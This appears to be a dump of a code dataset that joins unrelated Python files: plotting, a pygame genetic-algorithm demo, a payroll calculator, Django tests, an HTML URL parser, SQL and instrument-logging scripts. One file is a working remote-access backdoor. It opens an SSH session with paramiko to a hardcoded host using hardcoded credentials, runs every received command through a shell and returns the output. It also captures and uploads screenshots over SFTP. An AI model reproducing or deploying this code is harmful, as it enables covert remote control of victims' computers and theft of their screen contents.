#percentageAfternoonDogsOutcomes = [percentageAfternoonDogsAdopted, percentageAfternoonDogsDied, percentageAfternoonDogsTransfered, percentageAfternoonDogsReturnToOwners, percentageAfternoonDogsEuthanized]
#percentageNightDogsAdopted = NightDogsAdopted/numNightDogs*100
#percentageNightDogsDied = NightDogsDied/numNightDogs*100
#percentageNightDogsTransfered = NightDogsTransfered/numNightDogs*100
#percentageNightDogsReturnToOwners = NightDogsReturnedToOwners/numNightDogs*100
#percentageNightDogsEuthanized = NightDogsEuthanized/numNightDogs*100
#percentageNightDogsOutcomes = [percentageNightDogsAdopted, percentageNightDogsDied, percentageNightDogsTransfered, percentageNightDogsReturnToOwners, percentageNightDogsEuthanized]
#percentageMorningCatsAdopted = MorningCatsAdopted/numMorningCats*100
#percentageMorningCatsDied = MorningCatsDied/numMorningCats*100
#percentageMorningCatsTransfered = MorningCatsTransfered/numMorningCats*100
#percentageMorningCatsReturnToOwners = MorningCatsReturnedToOwners/numMorningCats*100
#percentageMorningCatsEuthanized = MorningCatsEuthanized/numMorningCats*100
#percentageMorningCatsOutcomes = [percentageMorningCatsAdopted, percentageMorningCatsDied, percentageMorningCatsTransfered, percentageMorningCatsReturnToOwners, percentageMorningCatsEuthanized]
#percentageAfternoonCatsAdopted = AfternoonCatsAdopted/numAfternoonCats*100
#percentageAfternoonCatsDied = AfternoonCatsDied/numAfternoonCats*100
#percentageAfternoonCatsTransfered = AfternoonCatsTransfered/numAfternoonCats*100
#percentageAfternoonCatsReturnToOwners = AfternoonCatsReturnedToOwners/numAfternoonCats*100
#percentageAfternoonCatsEuthanized = AfternoonCatsEuthanized/numAfternoonCats*100
#percentageAfternoonCatsOutcomes = [percentageAfternoonCatsAdopted, percentageAfternoonCatsDied, percentageAfternoonCatsTransfered, percentageAfternoonCatsReturnToOwners, percentageAfternoonCatsEuthanized]
#percentageNightCatsAdopted = NightCatsAdopted/numNightCats*100
#percentageNightCatsDied = NightCatsDied/numNightCats*100
#percentageNightCatsTransfered = NightCatsTransfered/numNightCats*100
#percentageNightCatsReturnToOwners = NightCatsReturnedToOwners/numNightCats*100
#percentageNightCatsEuthanized = NightCatsEuthanized/numNightCats*100
#percentageNightCatsOutcomes = [percentageNightCatsAdopted, percentageNightCatsDied, percentageNightCatsTransfered, percentageNightCatsReturnToOwners, percentageNightCatsEuthanized]
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageMorningDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Morning Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageAfternoonDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Afternoon Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageNightDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Night Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageMorningCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Morning Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageAfternoonCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Afternoon Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageNightCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Night Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show() |
12,754 | 2e3676ecb1b5e8a557d63e20bf6d432dc22d7f3d | import pygame
import random
import math
# Setup pygame
pygame.init()
screen = pygame.display.set_mode((800, 600))#, pygame.FULLSCREEN)
myfont = pygame.font.SysFont("monospace", 12)
clock = pygame.time.Clock()
bane = pygame.image.load('bane2.png')
# Initialize game variables
done = False
tilstand = 1
class Car():
def __init__(self, weights):
self.pos = [0,250]
self.dir = 0
self.weights = weights
self.steer = 0
def update(self, inputs):
self.steer = self.evaluate(inputs)
self.dir += self.steer
if self.dir > 1.5:
self.dir = 1.5
if self.dir < -1.5:
self.dir = -1.5
self.pos[0] += math.cos(self.dir)
self.pos[1] += math.sin(self.dir)
def dot(self,l1,l2):
a = 0
for i in range(len(l1)):
a += l1[i]*l2[i]
return a
def evaluate(self, inputs):
#1/(1+e^{-x})
x = self.dot(inputs,self.weights[0:len(inputs)]) + self.weights[-1]
print(x)
L = 0.1
k = 1
return (L/(1+math.exp(-k*x)))-0.05
class Game():
def __init__(self, width, height):
self.w = width
self.h = height
self.car = Car([random.random()-0.5 for i in range(6)])
self.latest_input = []
self.points = []
self.population = []
self.avg = 0
def get_weights_by_selection(self):
c1 = random.choice(self.population)
c2 = random.choice(self.population)
weights = [0 for i in range(len(c1[0]))]
for i in range(len(c1[0])):
if random.random() > 0.5:
weights[i] = c1[0][i]
else:
weights[i] = c2[0][i]
if random.random() > 0.01:
weights[i] = random.random()-0.5
return weights
def update(self):
inputs = []
game.points = []
for v in [-math.pi/3,-math.pi/6,0,math.pi/6,math.pi/3]:
l = 1
x = self.car.pos[0] + l * math.cos(v + self.car.dir)
y = self.car.pos[1] + l * math.sin(v + self.car.dir)
c = bane.get_at((int(x),int(y)))
while c == (0,0,0,255) and l < 150:
x = self.car.pos[0] + l * math.cos(v + self.car.dir)
y = self.car.pos[1] + l * math.sin(v + self.car.dir)
try:
c = bane.get_at((int(x),int(y)))
except:
c = (0,0,0,255)
l += 1
game.points.append((x,y))
inputs.append(l/100)
game.latest_input = inputs
self.car.update(inputs)
if self.car.pos[0] > 550 or bane.get_at((int(self.car.pos[0]),int(self.car.pos[1]))) != (0,0,0,255):
self.population.append((self.car.weights, self.car.pos[0]))
if len(self.population) > 100:
self.population.sort(key = lambda x:x[1], reverse=True)
self.population = self.population[0:100]
sum = 0
for c in self.population:
sum += c[1]
self.avg = sum/100
#print("Fitness: {}".format(self.car.pos[0]))
self.car = Car([random.random()-0.5 for i in range(6)])
if len(game.population) > 50 and random.random() > 0.5:
self.car.weights = game.get_weights_by_selection()
#print("Selection!")
game = Game(500,500)
def draw_game():
pygame.draw.rect(screen, (0,0,0), pygame.Rect(0,0,800,600))
screen.blit(bane, [0, 0])
pygame.draw.ellipse(screen, (255,255,255), pygame.Rect(game.car.pos[0]-6, game.car.pos[1]-6,12,12))
screen.blit(myfont.render("inputs: {}".format(game.latest_input), 0, (255,255,255)), (20,20))
screen.blit(myfont.render("output: {:0.2f}".format(game.car.steer), 0, (255,255,255)), (20,40))
#screen.blit(myfont.render("network: {}".format(game.car.weights), 0, (255,255,255)), (20,60))
screen.blit(myfont.render("speed: {}".format(speed), 0, (255,255,255)), (20,80))
screen.blit(myfont.render("Average fitness: {}".format(game.avg), 0, (255,255,255)), (20,100))
if len(game.population) > 0:
screen.blit(myfont.render("Max fitness: {}".format(game.population[0][1]), 0, (255,255,255)), (20,120))
for p in game.points:
pygame.draw.ellipse(screen, (200,100,200), pygame.Rect(p[0],p[1], 5, 5))
def output_logic(tilstand):
if tilstand == 1:
draw_game()
elif tilstand == 0:
draw_menu()
def draw_menu():
pass
speed = 1
#Main game loop
while not done:
for event in pygame.event.get():
if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):
done = True
if (event.type == pygame.KEYDOWN and event.key == pygame.K_q):
bane = pygame.image.load('bane3.png')
if (event.type == pygame.KEYDOWN and event.key == pygame.K_w):
bane = pygame.image.load('bane2.png')
if (event.type == pygame.KEYDOWN and event.key == pygame.K_a):
speed -= 1
if (event.type == pygame.KEYDOWN and event.key == pygame.K_s):
speed += 1
#Håndtering af input fra mus
if event.type == pygame.MOUSEBUTTONDOWN:
pos = pygame.mouse.get_pos()
for i in range(speed):
game.update()
output_logic(tilstand)
#pygame kommandoer til at vise grafikken og opdatere 60 gange i sekundet.
pygame.display.flip()
clock.tick(60)
|
12,755 | 1a70114722860900695a47978ccbef769f67b5d4 | # This program allows the user to input
# an employee's salary for SoftwarePirates Inc.
'''
====================================================
-------------------- Begin Main --------------------
====================================================
'''
# Global constants
ERROR = "\n⭕ ERROR:"
# The main function.
def main():
employee_salary()
print('⬐-----------------------------⬎')
print(' Bye! 🎃 ')
print('⬑-----------------------------⬏')
# The employee_salary function.
def employee_salary(ask_again = True):
employee_name = input_employee_name(3)
if employee_name != '':
worked_hours = input_worked_hours(employee_name)
if worked_hours != None:
hour_pay = input_hour_pays(employee_name)
if hour_pay != None:
gross_salary = worked_hours * hour_pay
each_deduction = calculate_deductions(gross_salary)
net_salary = gross_salary - each_deduction['deductions']
print()
print("The employee's name is ", employee_name, ".", sep = "")
print(" ⦧ Gross salary: ", format_to_currency(gross_salary), \
" (hours worked is ", worked_hours, " and an hourly pay rate is ", format_to_currency(hour_pay), ")", sep = "")
print(" ⦙ Deductions: ", format_to_currency(each_deduction['deductions']), sep = "\t")
print(" ⦙ ⧁ Income tax: ", format_to_currency(each_deduction['tax_rate']), sep = "\t")
print(" ⦙ ⧁ Social security tax: ", format_to_currency(each_deduction['social_security_rate']), sep = "\t")
print(" ⦙ ⧁ Medical plan: ", format_to_currency(each_deduction['medical_rate']), sep = "\t")
print(" ⦙ ⧁ Retirement.: ", format_to_currency(each_deduction['retirement_rate']), sep = "\t")
print(" ⦦ Net salary: ", format_to_currency(net_salary), sep = "\t")
if ask_again:
print()
again = str(input("Do you want to input another emplayee's salary? (y/n): ")).lower() == 'y'
if again:
print()
employee_salary()
# The format_to_currency function.
def format_to_currency(number):
return '$' + format(number, ',.2f')
# The input_employee_name function.
def input_employee_name(count, message = ''):
if count == 0:
print (ERROR, " must have an employee's name!")
print()
return ''
else:
if message != '':
print()
print(message)
name = str(input("Please enter an employee's name: "))
if name == '':
message = "Did't enter an employee's name! " + (count == 2 and "☞ 🔥 This is last chance!" or "")
return input_employee_name(count - 1, message)
else :
return name
# The input_worked_hours function.
def input_worked_hours(employee_name, less_value = 10):
try:
hours = float(input("Please enter " + employee_name + "'s hours worked: "))
if hours < less_value:
print(ERROR, 'hours worked must be large than or equal to', less_value)
print()
else:
max_value = 31 * 24
if hours > float(max_value):
print(" 💭 " + employee_name + " hard work! (☞ ❤️ Up to", max_value, "hours a month)")
return hours
except ValueError:
print(ERROR, 'hours worked must be valid numbers.')
print()
# The input_hour_pays function.
def input_hour_pays(employee_name, less_value = 9):
try:
rate = float(input("Please enter an hourly pay rate for " + employee_name + ": "))
if rate < less_value:
print(ERROR, ' an hourly pay rate must be large than or equal to $', less_value, sep = '')
print()
else:
return rate
except ValueError:
print(ERROR, 'an hourly pay rate must be valid numbers.')
print()
def calculate_deductions(gross_salary):
result = {'tax_rate': 0, 'social_security_rate': 0,
'medical_rate': 0, 'retirement_rate': 0,
'deductions': 0}
if gross_salary < 4000.0:
result['tax_rate'] = gross_salary * 0.12
result['social_security_rate'] = gross_salary * 0.04
result['medical_rate'] = gross_salary * 0.01
elif gross_salary < 8000.0:
result['tax_rate'] = gross_salary * 0.2
result['social_security_rate'] = gross_salary * 0.07
result['medical_rate'] = gross_salary * 0.03
elif gross_salary < 16000.0:
result['tax_rate'] = gross_salary * 0.3
result['social_security_rate'] = gross_salary * 0.09
result['medical_rate'] = gross_salary * 0.05
elif gross_salary >= 16000.0:
result['tax_rate'] = gross_salary * 0.38
result['social_security_rate'] = gross_salary * 0.11
result['medical_rate'] = gross_salary * 0.07
result['retirement_rate'] = gross_salary * 0.06
result['deductions'] = result['tax_rate'] + result['social_security_rate'] + \
result['medical_rate'] + result['retirement_rate']
return result
# Call the main function.
main()
'''
∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎
--------------------- End Main ---------------------
∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎
'''
|
12,756 | 8ca9b552a7e3784acef967f3a6bda78daf545c6d | #!/usr/bin/env python3
import subprocess
import paramiko
from PIL import ImageGrab
HOST = "127.0.0.1"
USERNAME = "root"
PASSWORD = "toor"
PORT = 8080
NAME = "001"
def main():
'''Entry point if called as an exeutable'''
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(HOST, port=PORT, username=USERNAME, password=PASSWORD, compress=True)
chan = client.get_transport().open_session()
chan.send("Client " + NAME + " is connected")
while True:
command = chan.recv(1024).decode()
try:
cmd = subprocess.check_output(command, shell=True)
chan.send(cmd)
except Exception as exc:
chan.send(str(exc))
print(str(chan.recv(1024)))
client.close()
def sftp(local_path, name):
'''Sends file from local_path to server'''
try:
transport = paramiko.Transport((HOST, PORT))
transport.connect(username=USERNAME, password=PASSWORD)
sftp_client = paramiko.SFTPClient.from_transport(transport)
sftp_client.put(local_path, name)
sftp_client.close()
return "[+] Done!"
except Exception as exc:
return str(exc)
def screenshot():
'''Takes screen shot and stores it in windows root dir then uploads image to server'''
try:
img = ImageGrab.grab()
img.save("C:\\screenshot.png")
except Exception as exc:
return str(exc)
return sftp("C:\\screenshot.png", "screenshot")
if __name__ == "__main__":
main() |
12,757 | e54b1fb269aeecf00d4d701a4bae104b59de2f79 | from django.test import TestCase
from six import StringIO
from django.core.management import call_command
from algoliasearch_django import algolia_engine
from algoliasearch_django import get_adapter
from algoliasearch_django import clear_index
from .models import Website
from .models import User
class CommandsTestCase(TestCase):
@classmethod
def tearDownClass(cls):
user_index_name = get_adapter(User).index_name
website_index_name = get_adapter(Website).index_name
algolia_engine.client.init_index(user_index_name).delete()
algolia_engine.client.init_index(website_index_name).delete()
def setUp(self):
# Create some records
User.objects.create(name='James Bond', username="jb")
User.objects.create(name='Captain America', username="captain")
User.objects.create(name='John Snow', username="john_snow",
_lat=120.2, _lng=42.1)
User.objects.create(name='Steve Jobs', username="genius",
followers_count=331213)
self.out = StringIO()
def tearDown(self):
clear_index(Website)
clear_index(User)
def test_reindex(self):
call_command('algolia_reindex', stdout=self.out)
result = self.out.getvalue()
regex = r'Website --> 0'
try:
self.assertRegex(result, regex)
except AttributeError:
self.assertRegexpMatches(result, regex)
regex = r'User --> 4'
try:
self.assertRegex(result, regex)
except AttributeError:
self.assertRegexpMatches(result, regex)
def test_reindex_with_args(self):
call_command('algolia_reindex', stdout=self.out, model=['Website'])
result = self.out.getvalue()
regex = r'Website --> \d+'
try:
self.assertRegex(result, regex)
except AttributeError:
self.assertRegexpMatches(result, regex)
regex = r'User --> \d+'
try:
self.assertNotRegex(result, regex)
except AttributeError:
self.assertNotRegexpMatches(result, regex)
def test_clearindex(self):
call_command('algolia_clearindex', stdout=self.out)
result = self.out.getvalue()
regex = r'Website'
try:
self.assertRegex(result, regex)
except AttributeError:
self.assertRegexpMatches(result, regex)
regex = r'User'
try:
self.assertRegex(result, regex)
except AttributeError:
self.assertRegexpMatches(result, regex)
def test_clearindex_with_args(self):
call_command(
'algolia_clearindex',
stdout=self.out,
model=['Website']
)
result = self.out.getvalue()
regex = r'Website'
try:
self.assertRegex(result, regex)
except AttributeError:
self.assertRegexpMatches(result, regex)
regex = r'User'
try:
self.assertNotRegex(result, regex)
except AttributeError:
self.assertNotRegexpMatches(result, regex)
def test_applysettings(self):
call_command('algolia_applysettings', stdout=self.out)
result = self.out.getvalue()
regex = r'Website'
try:
self.assertRegex(result, regex)
except AttributeError:
self.assertRegexpMatches(result, regex)
regex = r'User'
try:
self.assertRegex(result, regex)
except AttributeError:
self.assertRegexpMatches(result, regex)
def test_applysettings_with_args(self):
call_command('algolia_applysettings', stdout=self.out,
model=['Website'])
result = self.out.getvalue()
regex = r'Website'
try:
self.assertRegex(result, regex)
except AttributeError:
self.assertRegexpMatches(result, regex)
regex = r'User'
try:
self.assertNotRegex(result, regex)
except AttributeError:
self.assertNotRegexpMatches(result, regex)
|
12,758 | ed30400b87b830816e38fc40b78b3adc86dd1543 | from copy import deepcopy
from .strategy import FormatStrategy
from collections import OrderedDict
class MultiWayPlayerBetStrategy(FormatStrategy):
def __init__(self, strategy):
super().__init__(strategy)
def append_market(self, caller, parsed_market) -> None:
if not caller.player_name in caller.response[self.strategy]:
caller.response[self.strategy][caller.player_name] = OrderedDict(deepcopy(caller.event_info))
caller.response[self.strategy][caller.player_name].update({'playerName': caller.player_name})
caller.response[self.strategy][caller.player_name].move_to_end('playerName', last=False)
caller.response[self.strategy][caller.player_name]['markets'][caller.market_name].extend(parsed_market)
# Remove duplicates from market list
market_list = caller.response[self.strategy][caller.player_name]['markets'][caller.market_name]
market_list = [
dict(t) for t
in {tuple(d.items())
for d in market_list}
]
caller.response[self.strategy][caller.player_name]['markets'][caller.market_name] = market_list
|
12,759 | bdec5d7b7202b28760769a570d60ab8c7b7d5d32 | def main():
a, oper, b = input().split(' ')
try:
if oper == "+":
c = int(a)+int(b)
print(c, sep='\n')
elif oper == "-":
c = int(a)-int(b)
print(c, sep='\n')
elif oper == "*":
c = int(a)*int(b)
print(c, sep='\n')
elif oper == "/":
c = int(a)//int(b)
print(c, sep='\n')
except:
print('Неправильно. Попробуйте ещё раз.')
main()
main()
|
12,760 | e80cb48752a11854ee9a5af36f1872860993021f | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#
# @Time : 2019-08-16 11:18
# @Author : max
# @FileName: htmlparse.py
# @Software: PyCharm
import re
import warnings
warnings.filterwarnings('ignore')
from bs4 import BeautifulSoup
from urllib.parse import urlparse
exclude = ['javascript:;', '#']
# url所有后缀
suffix = ['html', 'htm', 'shtml', 'css', 'xml', 'gif', 'jpeg', 'jpg', 'js', 'atom',
'rss', 'mml', 'txt', 'jad', 'wml', 'htc', 'png', 'svg', 'svgz', 'tif',
'tiff', 'wbmp', 'webp', 'ico', 'jng', 'bmp', 'woff', 'woff2', 'jar', 'war',
'ear', 'json', 'hqx', 'doc', 'pdf', 'ps', 'eps', 'ai', 'rtf', 'm3u8', 'kml',
'kmz', 'xls', 'eot', 'ppt', 'odg', 'odp', 'ods', 'odt', 'pptx', 'docx', 'wmlc',
'7z', 'cco', 'jardiff', 'jnlp', 'run', 'pl', 'pm', 'prc','pdb', 'rar', 'rpm',
'sea', 'swf', 'sit', 'tcl', 'tk', 'der', 'pem', 'crt', 'xpi', 'xhtml', 'xspf',
'zip', 'bin', 'exe', 'dll', 'deb', 'dmg', 'iso', 'img', 'msi', 'msp', 'msm',
'mid', 'midi', 'kar', 'mp3', 'ogg', 'm4a', 'ra', '3gpp', '3gp', 'ts', 'mp4',
'mpeg', 'mpg', 'mov', 'webm', 'flv', 'm4v', 'mng', 'asx', 'asf', 'wmv', 'avi']
# url静态文件后缀
static_suffix = ['apk', 'css', 'xml', 'gif', 'jpeg', 'jpg', 'js', 'atom', 'rss',
'mml', 'txt','jad', 'wml', 'htc', 'png', 'svg', 'svgz', 'tif',
'tiff','wbmp', 'webp', 'ico', 'jng', 'bmp', 'woff', 'woff2',
'jar', 'war', 'ear','hqx', 'doc', 'pdf', 'ps', 'eps', 'ai',
'rtf', 'm3u8', 'kml', 'kmz', 'xls', 'eot', 'ppt','odg', 'odp',
'ods', 'odt', 'pptx', 'docx', 'wmlc', '7z', 'cco', 'jardiff',
'jnlp', 'run', 'pl', 'pm', 'prc','pdb', 'rar','rpm', 'sea', 'swf',
'sit', 'tcl', 'tk', 'der', 'pem', 'crt', 'xpi', 'xhtml', 'xspf',
'zip', 'bin', 'exe', 'dll', 'deb', 'dmg', 'iso', 'img', 'msi', 'msp',
'msm', 'mid', 'midi', 'kar', 'mp3', 'ogg', 'm4a', 'ra', '3gpp', '3gp',
'ts', 'mp4', 'mpeg', 'mpg', 'mov', 'webm', 'flv', 'm4v', 'mng', 'asx',
'asf', 'wmv', 'avi']
# 顶级域名后缀
top_domain_suffix = ('com', 'la', 'io', 'co', 'info', 'net', 'org', 'me', 'cn',
'mobi', 'us', 'biz', 'xxx', 'ca', 'co.jp', 'com.cn',
'net.cn', 'org.cn', 'mx', 'tv', 'ws', 'ag', 'com.ag',
'net.ag', 'org.ag', 'am', 'asia', 'at', 'be', 'com.br',
'net.br', 'bz', 'com.bz', 'net.bz', 'cc', 'com.co', 'net.co',
'nom.co', 'de', 'es', 'com.es', 'nom.es', 'org.es', 'eu',
'fm', 'fr', 'gs', 'in', 'co.in', 'firm.in', 'gen.in', 'ind.in',
'net.in', 'org.in', 'it', 'jobs', 'jp', 'ms', 'com.mx', 'nl',
'nu', 'co.nz', 'net.nz', 'org.nz', 'se', 'tc', 'tk', 'tw',
'com.tw', 'idv.tw', 'org.tw', 'hk', 'co.uk', 'me.uk', 'org.uk', 'vg')
class HtmlParse(object):
def __init__(self, text):
self.__text = text
self.soup = BeautifulSoup(text)
@staticmethod
def is_url(url):
if url:
if re.match(r'^https?:/{2}\w.+$', url):
return True
elif url[0] == '/':
return True
return False
@staticmethod
def is_static(url):
u_parse = urlparse(url)
index = u_parse.path.rfind('.') + 1
if index and u_parse.path[index:] in static_suffix:
return True
return False
def select_label(self, label, e = 'src'):
urls = []
for u in self.soup.find_all(label):
url = u.get(e)
if HtmlParse.is_url(url):
urls.append(url)
return urls
@property
def title(self):
return self.soup.title.string
@property
def a_label(self):
return self.select_label('a', 'href')
@property
def img_label(self):
return self.select_label('img')
@property
def script_label(self):
return self.select_label('script')
@property
def link_label(self):
return self.select_label('link', 'href')
@property
def urls(self):
urls = []
urls.extend(self.a_label)
urls.extend(self.img_label)
urls.extend(self.script_label)
urls.extend(self.link_label)
return urls |
12,761 | 1418f73449a6c5d59ee11df0c1e5a4b128b3269d | from django.shortcuts import render, get_object_or_404
from .models import Post, Comment
from .forms import CommentForm
from django.http import HttpResponseRedirect
# Create your views here.
def post(request, pk):
post = get_object_or_404(Post, pk=pk)
form = CommentForm()
if request.method == "POST":
form = CommentForm(request.POST, author=request.user, post=post)
if form.is_valid():
form.save()
return HttpResponseRedirect(request.path)
return render(request, "blog/post.html", {"post": post, "form": form})
|
12,762 | 8d07d886a0f2d5ddc62a97bd1cd06ac40ae7101a | # -*- coding: utf-8 -*-
"""Top-level package for Analysis Schema."""
__author__ = """Matthew Turk"""
__email__ = "matthewturk@gmail.com"
__version__ = "0.1.0"
from . import server # noqa F401
from .schema_model import schema, ytModel # noqa F401
|
12,763 | 48bc6fac5cd0c29d08634efdc1dcfc29851d6da1 | N, M = map(int, input().split())
inf = int(1e10)
dp = [inf] * (1 << N) #1をNだけシフトする 2**B
#鍵をビットで表す dp[i]は鍵の状態iにできる最小費用を
dp[0] = 0
bits = set()
bits.add(0)
for i in range(M):
a, b = map(int, input().split())
c = list(map(int, input().split()))
# cを状態keyに変換
key = 0
for t in c:
key += 1 << (t - 1)
# bits内のbitとkeyのORを更新
# 更新したbitはbitsに追加
add_bits = set()
for bit in bits:
tmp = bit | key
if dp[bit] + a < dp[tmp]:
dp[tmp] = dp[bit] + a
add_bits.add(tmp)
bits |= add_bits
if dp[(1 << N) - 1] == inf:
print(-1)
else:
print(dp[(1 << N) - 1]) |
12,764 | 136c809241d9154339579bb643d89fe4ca0edd9f |
import sqlalchemy
from sqlalchemy.ext.declarative import declarative_base
# Define the MySQL engine using MySQL Connector/Python
engine = sqlalchemy.create_engine(
'mysql://root:password@localhost:3306/classicmodels',
echo=True)
# Define and create the table
Base = declarative_base()
class User(Base):
__tablename__ = 'users'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String(length=50))
fullname = sqlalchemy.Column(sqlalchemy.String(length=50))
nickname = sqlalchemy.Column(sqlalchemy.String(length=50))
def __repr__(self):
return "<User(name='{0}', fullname='{1}', nickname='{2}')>".format(
self.name, self.fullname, self.nickname)
Base.metadata.create_all(engine)
# Create a session
Session = sqlalchemy.orm.sessionmaker()
Session.configure(bind=engine)
session = Session()
# Add a user
jwk_user = User(name='jesper', fullname='Jesper Wisborg Krogh', nickname='ggg')
session.add(jwk_user)
session.commit()
# Query the user
our_user = session.query(User).filter_by(name='jesper').first()
print('\nOur User:')
print(our_user)
print('Nick name in hex: {0}'.format(our_user.nickname.encode('utf-8')))
|
12,765 | cf87b17466ef1cab226b8a301061137dfd12a833 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 3 23:57:21 2021
@author: danney
"""
from distutils.core import setup
__version__ = "0.0"
setup(
name="axispy",
version=__version__,
description="Object to use an AXIS Camera as OpenCV's VideoCapture",
author="Dani Azemar",
author_email="dani.azemar@gmail.com",
packages=["axispy"],
install_requires=["sensecam_control"],
extras_require={
'dev': [
'pytest',
'python-dotenv'
]
classifiers=[
"License :: MIT",
# 'License :: Other/Proprietary License',
"Programming Language :: Python :: 3.8+",
],
)
|
12,766 | 036ecf9002f255d9a69088cbfc2fc465a26cbd88 | from django.contrib import admin
from .models import tls_feature
from .models import flow_feature
from .models import image_feature
admin.site.register(tls_feature)
admin.site.register(flow_feature)
admin.site.register(image_feature)
# Register your models here.
|
12,767 | 567640836ede6c1675b32b3d9b3b93cc4acbcb52 | def fact_lin_rec(n):
if n == 0:
return 1
else:
return n * fact_lin_rec(n-1)
print(fact_lin_rec(0))
print(fact_lin_rec(1))
print(fact_lin_rec(2))
print(fact_lin_rec(3))
print(fact_lin_rec(4))
print(fact_lin_rec(5))
|
12,768 | 4677d3da74b19f0bedc156090da156a2e3f722ef | # -*- coding: utf-8 -*-
"""
Created on December 27, 2020
@author: m8abdela
Measure 2-wire voltage using a multimeter (e.g. Agilent 34411A, hp 34401A)
"""
#import python modules (use anaconda prompt e.g. type 'pip install pyvisa' to install pyvisa)
import pyvisa #if does not work, import 'visa' instead
import time
import matplotlib.pyplot as plt
import scipy.io
#close plots from previous sessions
plt.close('all')
RealTimeReadings = 1;
sampleName = 'Cancinotech_PCB_SAC305_Sample1_Current_Fusing_LeftPCB';
failureflag = 0;
#variables time, temperature, resistance, voltage and current
t = []
T = []
R = []
V = []
I = []
#set file name based on time
fname=time.strftime("%y%m%d%H%M%S",time.localtime()) + sampleName #filename
#GPIB INITIALIZATION WITH
#Install 'Keysight connection expert' and 'IO Libraries Suite' to determine GPIB/USB address
rm = pyvisa.ResourceManager()
rm.list_resources()
multimeter = rm.open_resource('USB0::0x0957::0x0A07::MY48005925::0::INSTR')
tic = time.perf_counter()#start timer
while failureflag == 0:
toc=time.perf_counter()
t.append(toc-tic)
#use keysight command expert to obtain instrument-specific commands
temp_values = multimeter.query_ascii_values(':MEASure:VOLTage:DC? %s,%s' % ('DEF', 'DEF'))
measurement = temp_values[0]*1000
V.append(measurement)
#real-time plotting (voltage versus time, only updates last 300 points to avoid crashing)
plt.ion()
ff = plt.figure(1)
plt.cla()
plt.plot(t[max(0, len(t)-300):],V[max(0, len(t)-300):])
plt.xlabel('Time [s]')
plt.ylabel('Voltage [mV]')
plt.show()
ff.canvas.draw()
ff.canvas.flush_events()
#save variables as a mat file
data = {}
data['t'] = t
data['V'] = V
data['I'] = I
data['R'] = R
data['T'] = T
scipy.io.savemat('%s.mat' % fname, data)
time.sleep(0.1)
#close instruments
multimeter.close()
rm.close() |
12,769 | f04f886b9659b2213c79fc4db5179392d0530ca8 | # Derived from https://github.com/fschlimb/scale-out-benchs
import numpy as np
import pandas as pd
from pymapd import connect
from pandas.api.types import CategoricalDtype
from io import StringIO
from glob import glob
import os
import time
import pathlib
import sys
import argparse
def run_pd_workflow(quarter=1, year=2000, perf_file="", **kwargs):
t1 = time.time()
names = pd_load_names()
year_string = str(year) + "Q" + str(quarter) + ".txt"
acq_file = os.path.join(data_directory, "acq", "Acquisition_" + year_string)
print("READING DATAFILE", acq_file)
acq_pdf = pd_load_acquisition_csv(acq_file)
print("READING DATAFILE", perf_file)
perf_df_tmp = pd_load_performance_csv(perf_file)
print("read time", (time.time() - t1) * 1000)
t1 = time.time()
acq_pdf = acq_pdf.merge(names, how='left', on=['seller_name'])
acq_pdf.drop(columns=['seller_name'], inplace=True)
acq_pdf['seller_name'] = acq_pdf['new']
acq_pdf.drop(columns=['new'], inplace=True)
pdf = perf_df_tmp
everdf = create_ever_features(pdf)
delinq_merge = create_delinq_features(pdf)
everdf = join_ever_delinq_features(everdf, delinq_merge)
del(delinq_merge)
joined_df = create_joined_df(pdf, everdf)
testdf = create_12_mon_features(joined_df)
joined_df = combine_joined_12_mon(joined_df, testdf)
del(testdf)
perf_df = final_performance_delinquency(pdf, joined_df)
del(pdf, joined_df)
final_pdf = join_perf_acq_pdfs(perf_df, acq_pdf)
del(perf_df)
del(acq_pdf)
print("compute time", (time.time() - t1) * 1000)
final_pdf = last_mile_cleaning(final_pdf)
exec_time = (time.time() - t1) * 1000
